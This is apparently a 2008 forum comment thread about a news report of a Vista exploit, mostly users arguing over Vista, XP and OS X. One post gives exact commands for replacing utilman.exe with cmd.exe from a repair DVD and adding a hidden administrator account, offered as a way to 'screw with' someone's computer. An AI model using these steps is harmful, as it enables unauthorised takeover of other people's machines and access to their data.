http://www.neowin.net/news/main/08/08/08/v...-by-new-exploit



Have a lot of fun with Vista

I should really stop using Vista...

Sending to the trash my 'BootCamp partition'...

How funny is it that there was a Vista ad in the top Ad bar when I read this?

Oh, errm, ouch...

Good thing I'm on OS X... but still.. scary.

wanna really screw with someone that has vista?

How-To enable local Administrator access on a Vista system:

Boot off of any Vista DVD.
When you get to the first screen, select "Repair Your Computer", You should have an option for command prompt.

In Command Prompt, type the following:

c:
cd c:\windows\system32
ren utilman.exe utilman.old
copy cmd.exe utilman.exe

Remove the Vista DVD and reboot.
At the welcome screen, click the blue Accessibility button in the bottom left hand corner.
You should get a command prompt.

Type the following:

net user somebody 12345 /add
net localgroup Administrators somebody /add

(obviously replacing somebody and 12345 with whatever username and password you'd like.)

Give the computer a restart, you'll see the new account you've created.
You can now log in as an administrator.

It's very nice and easy to hack,
But I think user may want to make encryption to save his data

I stayed with XP Pro, and OSx86, and Linux. I'm ok.

apparently it is not just vista, it can also be cross platform ported to the osx. Guess we are all vulnerable. Java fault?

I like Vista and all...But...

Sense when the hell did any Windows OS have good security? If they did, there wouldn't be a need for virus scanners, or malware protection.

Took long enough. Vista lasted almost two full years without an exploit. I'd say that's pretty damn impressive. XP lasted, what was it, a month?

I'm sure Microsoft can come up with a 'fix' of sorts that will prevent this from being overly exploited. I've been running Vista x64 with no Anti Virus for about 6 months now and haven't had a single issue. Of course I prefer OS 10, but if I have to have Windows around Vista is loads better than XP.

Vista loads better than XP, that's a laugh. Next you'll be telling us laptop battery life is longer with Vista. What a joke.

This new type of exploit is wonderful. The big danger isn't to Vista users (nobody cares about them except the anti-virus vendors), the biggest danger is to Microsoft's DRM model which will now be totally compromised in short order. Once it becomes possible to load unsigned drivers and other code into the kernel space, the "trusted path" for hi-def content will be open for all to see and sniff.

I've read several articles about this in the last few days. It's not 1 exploit. It's a whole class of exploits that are possible because of the way .NET (and Java) work in IE. No-Execute memory protection is now worthless. The view of many people a lot smarter than I am, is that there is nothing MS can do to "patch" the holes. It's a fundamental flaw in the way Vista was designed.

Laughing is only when it's a joke though...Vista loads faster than what XP did for me. And I gotta say, shame on you for doing something or something or other, haven't thought that far yet.

Seconded.

Wow, can I get some links to more than just that article? This sounds quite interesting.

Vista is better than XP. After SP1, the 'performance hit' is increasingly minor, especially on computers made 2005 -> present. XP is dated and is really starting to show it. A fresh install comes with archaic applications that have no modern use, and is really lacking in end user features when compared to Vista. Vista has better hardware support, is more secure out of the box, comes with applications that better meet the needs of todays users, and has search and hardware acceleration amoung other things. Of course if one has XP there is no need to shell out $110 for Vista, but for people buying new computers Vista is a better alternative to XP.

I couldn't have said it better myself. (;

I read that it cannot be fixed, but I have no details D:

MS did this study a while ago that I was reading about on slashdot, they took a bunch of XP users who thought Vista was no good but who had actually never used it and told they had this new prototype OS that they wanted all these people to test out. The testers thought the "new" OS was so much better than XP, really they were just using Vista with a few cosmetic changes.

The look is quite important. Many users, especially old geeks, find Aero hideous, over the top and hindering productivity.
Microsoft has given only "Classic" as an alternative, which is worse than Windows 98.
So if you want a decent alternative you must download and install your own. /off-topic.

A lot of people prefer the classic look of windows over the new. I personally don't, I like Aero, but I like the themes I'm using now.

For people buying new computers there is no choice in the matter. There IS a performance hit, and no matter how "minor" you think it is, it's foolish to embrace an "upgrade" that consumes more resources in return for no gain in core functionality.

Vista's search function consumes significant system resources (a lot like Mac's Spotlight) and is one of the first things many people turn off. XP installs "archaic applications" out of the box? The last time I checked, no OS installs Photoshop, Premiere, Adobe Acrobat, AutoCAD, 3DSMAX, or a top-shelf word processor/spreadsheet package out-of-the-box. You have to buy those separately. And XP runs them all faster than Vista.

Vista "comes with applications that better meet the needs of todays users"? That's pure marketing-speak. That's some strong Kool-Ade you're drinking there, my friend.

http://www.mojaveexperiment.com/

People there say that Vista is horrible because, among others, it crashes a lot.
Are they pretending it isn't true?

http://forums.microsoft.com/technet/showpo...=0&pageid=0
(19 pages). It happens to thousands of people, you'll find a lot more about the subject if you google. It doesn't seem to have a single solution.
One computer engineer with 17 years experience said in that thread he had been driven mad by the problem, he had never seen anything like that before.

Vista never crashed for me so far, only if I overclocked some to much, but that's about it.

Its too bad that Vista is weak. While its not the "killer-OS" that Windows fanboys hoped for, I didn't thing it was that bad either. Its not as bad as the XP fanboys would have you believe.

I was getting ok with using it for gaming and running some non-OSX apps. I believe in a multi-OS universe. Competition amongst OSes is a benefit to the consumer.

I was using Vista with 1 GB ram a cheap ATI graphics card and a $60 e2140 and it worked great, the big reason for me to dump vista was not the performance or the reliability but the constant irritating nag messages, UAC was a joke, sure you can turn it off but it's now less secure, and even with it off there are still too many reminders, messages etc to do anything. I don't want an OS that constantly questions everything I would like to do.

Interesting story today seems to downplay the exploits and previous media hype around this story.

Black Hat's Alexander Sotirov: Vista security is not broken

Vista and security, sounds like something that doesn't mix well...

What is Microsoft's response to this exploit or have they not responded at all till now?

I've noted the a security flaw in Vista too: it needs to be turned on.

I would like to quote a friend from another site:


Sums it up well enough.

so its good that it will be fixed then my family still uses vista and to tell u the truth they have never got a virus or trojan or any spyware on it though thats probably cause I force them to keep UAC on

Issues yes (but it depends, how many and how serious).
But security? Nobody will ever convince me that *nix operating systems are as bad as Microsoft ones.
As to stability, I have never seen anything as serious as this:

http://forums.microsoft.com/technet/showpo...=0&pageid=0

in any other OS, especially *nix.

No 2 computers will run the programs the same, even if they are the same exact computers. That's the sad part of programs, which they were designed to run the same on the same 2 computers. People have had bad luck with Vista, people also have had good luck with Vista. Also, that post was made when Vista first came out. February 07. It may continue on, but it's an old issue, so compared to Vista right now, that proves nothing.

People do forget about one thing though with Vista, and something that Microsoft have failed with before, but now has gotten up to terms with it. 64-bit Operating system. XP64-bit was terrible, it may have been good for some, but the majority of 64-bit XP has had nothing but problems, and no gain from it. Where as now, where memory is getting cheaper and cheaper, more and more people are going with 4gb of ram or more. Which, you cannot do in a 32-bit Operating system unless the use of PAE, which is unstable completely. Vista 64-bit is the only 64-bit OS that is mainstream, yes Linux distros are 64-bit too, but they are not commonly used as Windows is. You can't use a full 4 gb of ram in 32-bit XP or Vista. That right there is XPs biggest limitation, and why it doesn't have long to last.

Now security, I'll quote my earlier post.

Windows has always had some type of flaw or hole in it's security. This is nothing new, the only reason why this is so big, is because it's such an easy and big exploit through java, which doesn't just limit itself to Windows then.

Just 2 points, vbetts:

Vista 64-bit has still drivers and compatibility issues, AFAIK. For instance I can't find a 64-bit dial-up modem driver for any of my computers.

As to Linux, you don't need to use 64-bit in order to take advantage of a large quantity of RAM, you only need the right kernel: major distributions will have it.

Well I bet no one saw that coming...

1.Vista itself still has drivers and compatibility issues. 64-bit Vista though does not have as much compared to XP 64 did.
2.No, you don't need a 64-bit OS to take 4 or more gb of ram on Linux. However, Linux is not a mainstream Operating system as Windows is. Though Linux so far imo is the best for multimedia.

I seriously think this exploit requires UAC to be disabled and even if u use internet explorer, it runs on Protected Mode so unless the user allows something unknown to execute no harm should be done.

This article doesn't really describe the requirements for this attack. I read on some other page this exploit could be used on other OS's, I will try and find the link.......

Besides this article doesn't state the requirements for the attack:

If someone is running as standard user with UAC and firewall enabled along with Internet explorer protected mode on, I seriously doubt any attack can damage the system without user permissions.

This is of course, given that you use the shitty apps that MS likes to bundle with their OSes. I just use FLP or nLite the crap out, then install QUALITY stuff one there, from the likes of Adobe or Cakewalk. I don't even use the search feature of any OS: I usually know where all my files are. I keep my {censored} organized. I don't understand what you're talking about hardware acceleration; Vista only uses hardware acceleration for it's pointless glass user interface, which I keep disabled whenever I use it.

The hardware support I can only give to you on one level: AHCI. I have to make sure to use nLite to add the proper driver if I'm installing on a new computer, but other than that I've never had any problems getting any hardware to work. (and if I don't care about AHCI, I just set it to IDE mode in bios)

I won't upgrade to vista until XP totally falls apart. And all those new "features" for which I'll have to wade through "user friendly" interface trash to disable are the reason.

Vendors think they're making things easier on their ignorant end users by changing everything with each new iteration, but all they're doing is alienating those same users by changing the way they do things. I'm fine; I can adapt (or adapt it to me). But who's really going to have a problem are the people who depend on me to keep their computers running. When something doesn't work just the way they expect, they scream for help. It doesn't matter how intuitive or easy it is to figure out, if it's not how it was before, you're going to have a problem.

We don't need a new user interface paradigm. What we need is a universally consistent interface which people can get used to.

Which won't happen for a few years. The only problem, later, might be drivers support, but I don't see that happening any time soon. In the meantime Microsoft will have released a new OS, hoping they have learned from their past mistakes.



I couldn't agree more. That is true both for Vista and KDE4, and that is one of the main reasons why I hate both.

Windows 7 as far as I know will be giving windows a visual refresh so lets see the hatred towards that once its released

That is just your opinion. I have plenty of clients that bought new computers with vista on it, but they hated it so I had to format the hard drive and install XP on their computers instead

why did they hate it? I bet it was cause of some reason like it asks me for permission for everything.

Same thing happening here. I don't repair people's computers (that would drive me mad), but that is what every computer engineer tells me in this town.
A "mildly geek" friend of mine bought Vista, but it didn't last long on his computer.



That could be one reason. But what about everything placed somewhere else? And what about Aero? It is ugly as sin, way over the top and it hinders your productivity.

I think people will get used to everything in different locations, I mean they will have to won't they?

As for aero, well most people actually like aero in my experience cause otherwise they would be using mac themes

Yeah flip 3d doesn't improve productivity it would be better if they had expose or added some useful effect

Maybe you have young, geek users in mind. But your average Joe hates Aero, I can assure you. And besides an average user doesn't even consider using another theme.